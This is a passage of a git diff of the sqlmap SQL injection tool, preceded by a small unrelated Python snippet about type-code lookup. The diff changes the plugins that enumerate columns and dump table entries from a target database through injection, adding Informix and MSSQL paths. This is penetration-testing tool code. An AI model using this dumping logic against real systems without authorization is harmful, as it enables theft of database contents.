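    # Normalize a value that may be a numeric string before using it as a key.
    SYBASE_TYPES = {1: "char", 2: "varchar", 7: "int"}  # assumed subset

    def resolve_type(value):
        key = int(value) if isinstance(value, str) and value.isdigit() else value
        return SYBASE_TYPES.get(key, value)

    print(resolve_type("7"))      # numeric string resolved through the int key
    print(resolve_type("image"))  # non-numeric values fall through unchanged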
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/generic/connector.py b/plugins/generic/connector.py index 7bce4748c..5ebbd0b82 100644 --- a/plugins/generic/connector.py +++ b/plugins/generic/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -11,6 +11,7 @@ from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapUndefinedMethod +from lib.core.settings import UNICODE_ENCODING class Connector: """ @@ -22,8 +23,8 @@ class Connector: self.cursor = None def initConnection(self): - self.user = conf.dbmsUser - self.password = conf.dbmsPass if conf.dbmsPass is not None else "" + self.user = conf.dbmsUser or "" + self.password = conf.dbmsPass or "" self.hostname = conf.hostname self.port = conf.port self.db = conf.dbmsDb diff --git a/plugins/generic/custom.py b/plugins/generic/custom.py index 2871d90c4..944b5c63c 100644 --- a/plugins/generic/custom.py +++ b/plugins/generic/custom.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -17,6 +17,7 @@ from lib.core.data import conf from lib.core.data import logger from lib.core.dicts import SQL_STATEMENTS from lib.core.enums import AUTOCOMPLETE_TYPE +from lib.core.exception import SqlmapNoneDataException from lib.core.settings import NULL from lib.core.settings import PARAMETER_SPLITTING_REGEX from lib.core.shell import autoCompletion @@ -35,38 +36,42 @@ class Custom: sqlType = None query = query.rstrip(';') - for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): - for sqlStatement in sqlStatements: - if query.lower().startswith(sqlStatement): - sqlType = sqlTitle - break + try: + for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): + for sqlStatement in sqlStatements: + if query.lower().startswith(sqlStatement): + sqlType = sqlTitle + break - if not any(_ in query.upper() for _ in ("OPENROWSET", "INTO")) and (not sqlType or "SELECT" in sqlType): - infoMsg = "fetching %s query output: '%s'" % (sqlType if sqlType is not None else "SQL", query) - logger.info(infoMsg) + if not any(_ in query.upper() for _ in ("OPENROWSET", "INTO")) and (not sqlType or "SELECT" in sqlType): + infoMsg = "fetching %s query output: '%s'" % (sqlType if sqlType is not None else "SQL", query) + logger.info(infoMsg) - output = inject.getValue(query, fromUser=True) + output = inject.getValue(query, fromUser=True) - return output - elif not isStackingAvailable() and not conf.direct: - warnMsg = "execution of custom SQL queries is only " - warnMsg += "available when stacked queries are supported" - logger.warn(warnMsg) + return output + elif not isStackingAvailable() and not conf.direct: + warnMsg = "execution of non-query SQL statements is only " + warnMsg += "available when stacked queries are supported" + logger.warn(warnMsg) - return None - else: - if sqlType: - debugMsg = "executing %s query: '%s'" % (sqlType if sqlType is not None else "SQL", query) + return None else: - debugMsg = "executing unknown SQL type query: '%s'" % query - logger.debug(debugMsg) + if sqlType: + debugMsg = "executing %s query: '%s'" % (sqlType if sqlType 
is not None else "SQL", query) + else: + debugMsg = "executing unknown SQL type query: '%s'" % query + logger.debug(debugMsg) - inject.goStacked(query) + inject.goStacked(query) - debugMsg = "done" - logger.debug(debugMsg) + debugMsg = "done" + logger.debug(debugMsg) - output = NULL + output = NULL + + except SqlmapNoneDataException, ex: + logger.warn(ex) return output @@ -114,15 +119,18 @@ class Custom: infoMsg = "executing SQL statements from given file(s)" logger.info(infoMsg) - for sfile in re.split(PARAMETER_SPLITTING_REGEX, conf.sqlFile): - sfile = sfile.strip() + for filename in re.split(PARAMETER_SPLITTING_REGEX, conf.sqlFile): + filename = filename.strip() - if not sfile: + if not filename: continue - query = getSQLSnippet(Backend.getDbms(), sfile) + snippet = getSQLSnippet(Backend.getDbms(), filename) - infoMsg = "executing SQL statement%s from file '%s'" % ("s" if ";" in query else "", sfile) - logger.info(infoMsg) - - conf.dumper.query(query, self.sqlQuery(query)) + if snippet and all(query.strip().upper().startswith("SELECT") for query in filter(None, snippet.split(';' if ';' in snippet else '\n'))): + for query in filter(None, snippet.split(';' if ';' in snippet else '\n')): + query = query.strip() + if query: + conf.dumper.query(query, self.sqlQuery(query)) + else: + conf.dumper.query(snippet, self.sqlQuery(snippet)) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 195b2d6a7..ddea7215b 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -1,13 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.agent import agent from lib.core.common import arrayizeValue from lib.core.common import Backend +from lib.core.common import extractRegexResult from lib.core.common import filterPairValues from lib.core.common import flattenValue from lib.core.common import getLimitRange @@ -19,6 +20,7 @@ from lib.core.common import isTechniqueAvailable from lib.core.common import parseSqliteTableSchema from lib.core.common import popValue from lib.core.common import pushValue +from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import singleTimeWarnMessage @@ -30,6 +32,7 @@ from lib.core.data import logger from lib.core.data import paths from lib.core.data import queries from lib.core.dicts import FIREBIRD_TYPES +from lib.core.dicts import INFORMIX_TYPES from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED @@ -39,8 +42,9 @@ from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import CURRENT_DB from lib.request import inject -from lib.techniques.brute.use import columnExists -from lib.techniques.brute.use import tableExists +from lib.techniques.union.use import unionUse +from lib.utils.brute import columnExists +from lib.utils.brute import tableExists class Databases: """ @@ -211,7 +215,7 @@ class Databases: conf.db = conf.db.upper() if conf.db: - dbs = conf.db.split(",") + dbs = conf.db.split(',') else: dbs = self.getDbs() @@ -238,12 +242,12 @@ class Databases: return kb.data.cachedTables - message = "do you want to use common table existence check? 
%s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") + message = "do you want to use common table existence check? %s " % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: return tableExists(paths.COMMON_TABLES) @@ -265,9 +269,9 @@ class Databases: if conf.excludeSysDbs: infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) logger.info(infoMsg) - query += " IN (%s)" % ",".join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList) + query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList) else: - query += " IN (%s)" % ",".join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs)) + query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs)) if len(dbs) < 2 and ("%s," % condition) in query: query = query.replace("%s," % condition, "", 1) @@ -332,7 +336,7 @@ class Databases: query = rootQuery.blind.query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ") elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): query = rootQuery.blind.query % index - elif Backend.isDbms(DBMS.HSQLDB): + elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.INFORMIX): query = rootQuery.blind.query % (index, unsafeSQLIdentificatorNaming(db)) else: query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index) @@ -358,7 +362,7 @@ class Databases: if bruteForce is None: logger.error(errMsg) return self.getTables(bruteForce=True) - else: + elif not conf.search: raise SqlmapNoneDataException(errMsg) else: for db, tables in kb.data.cachedTables.items(): @@ -370,7 +374,7 @@ class Databases: return kb.data.cachedTables - def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): + def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: @@ -415,10 +419,10 @@ class Databases: colList = filter(None, colList) if conf.tbl: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.tbl = conf.tbl.upper() - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') else: self.getTables() @@ -432,10 +436,12 @@ class Databases: tblList = tblList[0] tblList = list(tblList) - else: + elif not conf.search: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) raise SqlmapNoneDataException(errMsg) + else: + return kb.data.cachedColumns tblList = filter(None, (safeSQLIdentificatorNaming(_, True) for _ in tblList)) @@ -448,7 +454,7 @@ class Databases: elif Backend.isDbms(DBMS.ACCESS): errMsg = "cannot retrieve column names, " - errMsg += "back-end DBMS is Access" + errMsg += "back-end DBMS is %s" % DBMS.ACCESS logger.error(errMsg) bruteForce = True @@ -480,11 +486,11 @@ class Databases: return kb.data.cachedColumns message = "do you want to use common column existence check? 
%s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: return columnExists(paths.COMMON_COLUMNS) @@ -509,7 +515,7 @@ class Databases: if len(colList) > 0: if colTuple: _, colCondParam = colTuple - infoMsg += "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) + infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) else: colCondParam = "='%s'" infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) @@ -517,10 +523,6 @@ class Databases: condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery @@ -534,7 +536,29 @@ class Databases: elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): query = rootQuery.inband.query % tbl - values = inject.getValue(query, blind=False, time=False) + if dumpMode and colList: + values = [(_,) for _ in colList] + else: + infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.info(infoMsg) + + values = None + if Backend.isDbms(DBMS.MSSQL) and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): + expression = query + kb.dumpColumns = [] + kb.rowXmlMode = True + + for column in extractRegexResult(r"SELECT (?P<result>.+?) 
FROM", query).split(','): + kb.dumpColumns.append(randomStr().lower()) + expression = expression.replace(column, "%s AS %s" % (column, kb.dumpColumns[-1]), 1) + + values = unionUse(expression) + kb.rowXmlMode = False + kb.dumpColumns = None + + if values is None: + values = inject.getValue(query, blind=False, time=False) if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): index, values = 1, [] @@ -567,7 +591,11 @@ class Databases: query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(name.upper())) else: query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(name)) + comment = unArrayizeValue(inject.getValue(query, blind=False, time=False)) + if not isNoneValue(comment): + infoMsg = "retrieved comment '%s' for column '%s'" % (comment, name) + logger.info(infoMsg) else: warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() warnMsg += "possible to get column comments" @@ -576,8 +604,17 @@ class Databases: if len(columnData) == 1: columns[name] = None else: + key = int(columnData[1]) if isinstance(columnData[1], basestring) and columnData[1].isdigit() else columnData[1] if Backend.isDbms(DBMS.FIREBIRD): - columnData[1] = FIREBIRD_TYPES.get(columnData[1], columnData[1]) + columnData[1] = FIREBIRD_TYPES.get(key, columnData[1]) + elif Backend.isDbms(DBMS.INFORMIX): + notNull = False + if isinstance(key, int) and key > 255: + key -= 256 + notNull = True + columnData[1] = INFORMIX_TYPES.get(key, columnData[1]) + if notNull: + columnData[1] = "%s NOT NULL" % columnData[1] columns[name] = columnData[1] @@ -604,7 +641,7 @@ class Databases: if len(colList) > 0: if colTuple: _, colCondParam = colTuple - infoMsg += "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) + infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) else: colCondParam = "='%s'" infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) @@ -612,10 +649,6 @@ class Databases: condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery @@ -633,38 +666,51 @@ class Databases: query = rootQuery.blind.count % (tbl) query += condQuery + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.count % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl) + query += condQuery + elif Backend.isDbms(DBMS.SQLITE): query = rootQuery.blind.query % tbl value = unArrayizeValue(inject.getValue(query, union=False, error=False)) parseSqliteTableSchema(value) return kb.data.cachedColumns - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - table = {} columns = {} - if not isNumPosStrValue(count): - if Backend.isDbms(DBMS.MSSQL): - count, index, values = 0, 1, [] - while True: - query = rootQuery.blind.query3 % (conf.db, tbl, index) - value = unArrayizeValue(inject.getValue(query, union=False, error=False)) - if isNoneValue(value) or value == " ": - break - else: 
- columns[safeSQLIdentificatorNaming(value)] = None - index += 1 + if dumpMode and colList: + count = 0 + for value in colList: + columns[safeSQLIdentificatorNaming(value)] = None + else: + infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.info(infoMsg) - if not columns: - errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "") - errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.error(errMsg) - continue + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if not isNumPosStrValue(count): + if Backend.isDbms(DBMS.MSSQL): + count, index, values = 0, 1, [] + while True: + query = rootQuery.blind.query3 % (conf.db, tbl, index) + value = unArrayizeValue(inject.getValue(query, union=False, error=False)) + if isNoneValue(value) or value == " ": + break + else: + columns[safeSQLIdentificatorNaming(value)] = None + index += 1 + + if not columns: + errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "") + errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.error(errMsg) + continue for index in getLimitRange(count): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery field = None @@ -680,6 +726,10 @@ class Databases: query = rootQuery.blind.query % (tbl) query += condQuery field = None + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.query % (index, conf.db, conf.db, conf.db, conf.db, conf.db, tbl) + query += condQuery + field = condition query = agent.limitQuery(index, query, field, field) column = unArrayizeValue(inject.getValue(query, union=False, error=False)) @@ -692,7 +742,11 @@ class Databases: query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(column.upper())) else: query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(column)) + comment = unArrayizeValue(inject.getValue(query, union=False, error=False)) + if not isNoneValue(comment): + infoMsg = "retrieved comment '%s' for column '%s'" % (comment, column) + logger.info(infoMsg) else: warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() warnMsg += "possible to get column comments" @@ -708,11 +762,22 @@ class Databases: conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query2 % (tbl, column) + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl, column) colType = unArrayizeValue(inject.getValue(query, union=False, error=False)) + key = int(colType) if isinstance(colType, basestring) and colType.isdigit() else colType if Backend.isDbms(DBMS.FIREBIRD): - colType = FIREBIRD_TYPES.get(colType, colType) + colType = FIREBIRD_TYPES.get(key, colType) + elif Backend.isDbms(DBMS.INFORMIX): + notNull = False + if isinstance(key, int) and key > 255: + key -= 256 + notNull = True + colType = 
INFORMIX_TYPES.get(key, colType) + if notNull: + colType = "%s NOT NULL" % colType column = safeSQLIdentificatorNaming(column) columns[column] = colType @@ -805,7 +870,7 @@ class Databases: elif "." in conf.tbl: if not conf.db: - conf.db, conf.tbl = conf.tbl.split(".") + conf.db, conf.tbl = conf.tbl.split('.', 1) if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): warnMsg = "missing database parameter. sqlmap is going to " @@ -818,7 +883,7 @@ class Databases: self.forceDbmsEnum() if conf.tbl: - for table in conf.tbl.split(","): + for table in conf.tbl.split(','): self._tableGetCount(conf.db, table) else: self.getTables() diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 125aa8226..5e1ad3321 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -12,6 +12,7 @@ from lib.core.bigarray import BigArray from lib.core.common import Backend from lib.core.common import clearConsoleLine from lib.core.common import getLimitRange +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import isInferenceAvailable from lib.core.common import isListLike @@ -42,7 +43,6 @@ from lib.core.settings import NULL from lib.request import inject from lib.utils.hash import attackDumpedTable from lib.utils.pivotdumptable import pivotDumpTable -from lib.utils.pivotdumptable import whereQuery class Entries: """ @@ -79,7 +79,7 @@ class Entries: if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.tbl = conf.tbl.upper() - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') else: self.getTables() @@ -88,10 +88,12 @@ class Entries: if isinstance(tblList[0], (set, tuple, list)): tblList = tblList[0] - else: + elif not conf.search: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) raise SqlmapNoneDataException(errMsg) + else: + return for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) @@ -102,12 +104,15 @@ class Entries: if foundData is None: kb.data.cachedColumns = {} - self.getColumns(onlyColNames=True) + self.getColumns(onlyColNames=True, dumpMode=True) else: kb.data.cachedColumns = foundData try: - kb.dumpTable = "%s.%s" % (conf.db, tbl) + if Backend.isDbms(DBMS.INFORMIX): + kb.dumpTable = "%s:%s" % (conf.db, tbl) + else: + kb.dumpTable = "%s.%s" % (conf.db, tbl) if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \ or safeSQLIdentificatorNaming(tbl, True) not in \ @@ -134,6 +139,7 @@ class Entries: logger.warn(warnMsg) continue + kb.dumpColumns = colList colNames = colString = ", ".join(column for column in colList) rootQuery = queries[Backend.getIdentifiedDbms()].dump_table @@ -164,11 +170,44 @@ class Entries: if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL): table = "%s.%s" % (conf.db, tbl) - retVal = pivotDumpTable(table, colList, blind=False) + if Backend.isDbms(DBMS.MSSQL): + query = rootQuery.blind.count % table + query = agent.whereQuery(query) - if retVal: - entries, _ = retVal - entries = zip(*[entries[colName] for colName in colList]) + count = inject.getValue(query, blind=False, time=False, 
expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if isNumPosStrValue(count): + try: + indexRange = getLimitRange(count, plusOne=True) + + for index in indexRange: + row = [] + for column in colList: + query = rootQuery.blind.query3 % (column, column, table, index) + query = agent.whereQuery(query) + value = inject.getValue(query, blind=False, time=False, dump=True) or "" + row.append(value) + + entries.append(row) + + except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warn(warnMsg) + + if not entries and not kb.dumpKeyboardInterrupt: + try: + retVal = pivotDumpTable(table, colList, blind=False) + except KeyboardInterrupt: + retVal = None + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warn(warnMsg) + + if retVal: + entries, _ = retVal + entries = zip(*[entries[colName] for colName in colList]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): @@ -176,10 +215,17 @@ class Entries: else: query = rootQuery.inband.query % (colString, conf.db, tbl) - query = whereQuery(query) + query = agent.whereQuery(query) - if not entries and query: - entries = inject.getValue(query, blind=False, time=False, dump=True) + if not entries and query and not kb.dumpKeyboardInterrupt: + try: + entries = inject.getValue(query, blind=False, time=False, dump=True) + except KeyboardInterrupt: + entries = None + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warn(warnMsg) if not isNoneValue(entries): if isinstance(entries, basestring): @@ -202,8 +248,7 @@ class Entries: else: colEntry = unArrayizeValue(entry[index]) if index < len(entry) else u'' - _ = len(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry))) - maxLen = max(len(column), _) + maxLen = max(len(column), len(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry)))) if maxLen > kb.data.dumpedTable[column]["length"]: kb.data.dumpedTable[column]["length"] = maxLen @@ -226,10 +271,12 @@ class Entries: query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl)) elif Backend.isDbms(DBMS.MAXDB): query = rootQuery.blind.count % tbl + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.count % (conf.db, tbl) else: query = rootQuery.blind.count % (conf.db, tbl) - query = whereQuery(query) + query = agent.whereQuery(query) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) @@ -264,19 +311,56 @@ class Entries: elif Backend.isDbms(DBMS.MAXDB): table = "%s.%s" % (conf.db, tbl) - retVal = pivotDumpTable(table, colList, count, blind=True) + if Backend.isDbms(DBMS.MSSQL): + try: + indexRange = getLimitRange(count, plusOne=True) - if retVal: - entries, lengths = retVal + for index in indexRange: + for column in colList: + query = rootQuery.blind.query3 % (column, column, table, index) + query = agent.whereQuery(query) + + value = inject.getValue(query, union=False, error=False, dump=True) or "" + + if column not in lengths: + lengths[column] = 0 + + if column not in entries: + entries[column] = BigArray() + + lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)))) + entries[column].append(value) + + except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + 
logger.warn(warnMsg) + + if not entries and not kb.dumpKeyboardInterrupt: + try: + retVal = pivotDumpTable(table, colList, count, blind=True) + except KeyboardInterrupt: + retVal = None + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warn(warnMsg) + + if retVal: + entries, lengths = retVal else: emptyColumns = [] plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, dump=True, plusOne=plusOne) + indexRange = getLimitRange(count, plusOne=plusOne) if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: + debugMsg = "checking for empty columns" + logger.debug(infoMsg) + for column in colList: - if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0': + if not inject.checkBooleanExpression("(SELECT COUNT(%s) FROM %s)>0" % (column, kb.dumpTable)): emptyColumns.append(column) debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable) debugMsg += "dumped as it appears to be empty" @@ -293,28 +377,27 @@ class Entries: if column not in entries: entries[column] = BigArray() - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.blind.query % (agent.preprocessField(tbl, column), - tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), - index) + query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index) elif Backend.isDbms(DBMS.SQLITE): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl, index) - elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), tbl) + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), conf.db, tbl, sorted(colList, key=len)[0]) - query = whereQuery(query) + query = agent.whereQuery(query) value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True) value = '' if value is None else value - _ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)) - lengths[column] = max(lengths[column], len(_)) + lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)))) entries[column].append(value) except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) @@ -341,16 +424,17 @@ class Entries: attackDumpedTable() except (IOError, OSError), ex: errMsg = "an error occurred while attacking " - errMsg += "table dump ('%s')" % ex.message + errMsg += "table dump ('%s')" % getSafeExString(ex) logger.critical(errMsg) conf.dumper.dbTableValues(kb.data.dumpedTable) except SqlmapConnectionException, ex: errMsg = "connection exception detected in dumping phase " - errMsg += "('%s')" % ex.message + errMsg += "('%s')" % getSafeExString(ex) logger.critical(errMsg) finally: + kb.dumpColumns = None kb.dumpTable = None def dumpAll(self): @@ -391,9 +475,8 @@ class Entries: def dumpFoundColumn(self, dbs, foundCols, colConsider): message = "do you want to dump entries? 
